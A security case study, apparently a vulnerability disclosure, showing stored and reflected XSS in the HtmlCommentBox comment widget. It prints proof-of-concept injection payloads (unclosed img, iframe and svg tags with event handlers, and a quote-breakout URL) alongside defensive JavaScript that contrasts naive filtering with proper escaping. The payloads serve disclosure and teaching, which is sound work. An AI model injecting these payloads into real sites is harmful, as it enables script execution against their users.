This is a small case study whose aim is to explain why you shouldn't use untrusted third-party scripts on your website. HtmlCommentBox is a third-party script that can be embedded into any web page to give users a place to comment and interact with each other. I feel it is poorly coded from both the user's perspective and the security perspective, as it can introduce a lot of spam on your website.
Let's talk about what else it can do, beyond introducing spam, from a security perspective. We [me and Pepe Vila] found two attack vectors in HtmlCommentBox: it does not sanitise user input properly, resulting in a stored XSS, and it also has a reflected XSS. Either one obviously leaves a wide variety of attack vectors open to an attacker.
Stored XSS POC
The POC is very simple. It seems you can inject anything as long as you don't close the tag; the browser's parser closes it for you at the next ">" it meets in the surrounding markup:
Example:
<img src=x onerror=prompt(0);
<iframe/onload=prompt(0);
<svg/onload=prompt(0);
Let's see a demonstration of this on their live website, where they themselves have embedded HtmlCommentBox, making their own site vulnerable to the stored XSS too.
The following page is where users can request additional features; as you can clearly see from the picture, it is using HtmlCommentBox. All I did was inject the following payload into the message box:
<img src=x onerror=prompt(0);
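As an added illustration (not code from the original post or from HtmlCommentBox), the JavaScript below contrasts a hypothetical naive tag-stripping filter, the kind of filter these unclosed payloads walk straight past, with escaping the HTML metacharacters on output. The naive filter, its regex and the small detection helper are assumptions made for this example; nothing here describes HtmlCommentBox's actual code.

```javascript
// Added example, not HtmlCommentBox's code. Shows why a filter that only
// removes complete <...> tags (a hypothetical filter, assumed here) lets the
// unclosed payloads from the post through, and what output escaping does instead.

// The three payloads from the post: none of them contains a closing ">".
const PAYLOADS = [
  "<img src=x onerror=prompt(0);",
  "<iframe/onload=prompt(0);",
  "<svg/onload=prompt(0);",
];

// Hypothetical naive filter: delete anything that looks like a complete tag.
// An unclosed tag never matches, so it survives untouched, and the browser's
// tokenizer will close it at the next ">" it meets in the surrounding page.
function naiveStripTags(comment) {
  return comment.replace(/<[^>]*>/g, "");
}

// Proper defence: encode HTML metacharacters when the comment is written into
// the page, so the browser treats it as text rather than markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Rough check used only to illustrate the result: is there a tag opener
// followed by an on*= event-handler attribute left in the string?
function containsEventHandler(html) {
  return /<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Run all three payloads through both paths and report what survives.
function compare() {
  return PAYLOADS.map((p) => ({
    payload: p,
    afterNaiveFilter: naiveStripTags(p),
    naiveFilterLeavesHandler: containsEventHandler(naiveStripTags(p)),
    afterEscaping: escapeHtml(p),
    escapingLeavesHandler: containsEventHandler(escapeHtml(p)),
  }));
}

console.log(compare());
```

Running it shows every unclosed payload coming out of the naive filter byte-for-byte unchanged, handler attribute included, while the escaped form contains no "<" at all and is rendered as harmless text.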
Second Issue - Reflected XSS
Well, this is not all, we have more for you: implementing HtmlCommentBox also makes your website vulnerable to a non-persistent (reflected) XSS.
Let's take a closer look at their script that users would implement on their page:
    (function () {
      var s = document.createElement("script"),
          // the current page URL (hcb_user.PAGE is a fallback the embedder can set)
          l = ("" + window.location || hcb_user.PAGE),
          h = "//www.htmlcommentbox.com";
      s.setAttribute("type", "text/javascript");
      // the page URL is URL-encoded and sent to /jread as the "page" parameter
      // (encodeURIComponent already turns "+" into "%2B", so the replace changes nothing)
      s.setAttribute("src", h + "/jread?page=" + encodeURIComponent(l).replace("+", "%2B") + "&opts=16862&num=10");
      if (typeof s != "undefined") document.getElementsByTagName("head")[0].appendChild(s);
    })();
Look closely at the window.location portion. The page URL goes through encodeURIComponent, which does not encode single quotes (nor parentheses or hyphens), and is then sent to /jread as the page parameter, which jread reflects back inside the script it returns. If we put a single quote followed by our own JavaScript into the page URL, it breaks out of the string the value is reflected into and is executed in script context, so any website embedding the widget becomes vulnerable to XSS. A request such as /jread?page='-prompt(1)-'&opts=x&num=y returns a script in which that value is reflected unescaped.
So the POC would be as follows:
http://www.htmlcommentbox.com/?'-prompt(1)-'
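To make the reflected path concrete, here is an added JavaScript example (not the post's code and not HtmlCommentBox's). It rebuilds the jread URL exactly as the embed snippet does, then simulates a server that echoes the page parameter into a single-quoted JS string literal; that reflection format is an assumption, since jread's real response is not shown on this page. The hardened variant is likewise mine.

```javascript
// Added example, not HtmlCommentBox's code. Simulates the reflected XSS: the
// embed snippet sends encodeURIComponent(window.location) as "page", and a
// server that reflects that value into a JS string without escaping is
// exploitable. The exact reflection format of jread is an assumption.

// Constructed attacker URL, same shape as the POC in the post.
const ATTACK_URL = "http://www.htmlcommentbox.com/?'-prompt(1)-'";
const HCB = "//www.htmlcommentbox.com";

// What the embed snippet builds on the client. encodeURIComponent leaves the
// single quote, the parentheses and the hyphens untouched.
function buildJreadUrl(location) {
  return "http:" + HCB + "/jread?page=" +
    encodeURIComponent(location).replace("+", "%2B") + "&opts=16862&num=10";
}

// Hypothetical vulnerable server: decodes "page" and drops it straight into a
// single-quoted string literal.
function vulnerableJread(requestUrl) {
  const page = new URL(requestUrl).searchParams.get("page");
  return "var hcb_page='" + page + "';";
}

// Hardened server: JSON.stringify escapes quotes and backslashes; "<" is also
// escaped so the value can never close a <script> element if inlined.
function hardenedJread(requestUrl) {
  const page = new URL(requestUrl).searchParams.get("page");
  return "var hcb_page=" + JSON.stringify(page).replace(/</g, "\\u003c") + ";";
}

// Execute a returned script the way the browser would, with prompt() replaced
// by a recorder so we can see whether the injected call ever runs.
function run(script) {
  const calls = [];
  const fn = new Function("prompt", script + " return hcb_page;");
  const hcb_page = fn((x) => { calls.push(x); return ""; });
  return { promptCalls: calls, hcb_page: hcb_page };
}

console.log("vulnerable:", vulnerableJread(buildJreadUrl(ATTACK_URL)), run(vulnerableJread(buildJreadUrl(ATTACK_URL))));
console.log("hardened:  ", hardenedJread(buildJreadUrl(ATTACK_URL)), run(hardenedJread(buildJreadUrl(ATTACK_URL))));
```

The vulnerable response comes back as var hcb_page='http://www.htmlcommentbox.com/?'-prompt(1)-''; which is valid JavaScript that calls prompt(1) as a side effect of the subtraction; the hardened response keeps the whole URL inside one string literal and prompt is never called.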
Again, I am very thankful to @pepevila for pointing out the second issue.
The lesson to be learned: businesses that rely on third-party scripts on their websites should use well-known scripts and make sure they are not vulnerable to attack, or at least research whether there have been security issues with them in the past, because these third-party scripts are often responsible for security breaches.
Take the example from this case study, where using a third-party script to host comments introduced high-risk security vulnerabilities. Anyone using this script on their website is requested to remove it immediately.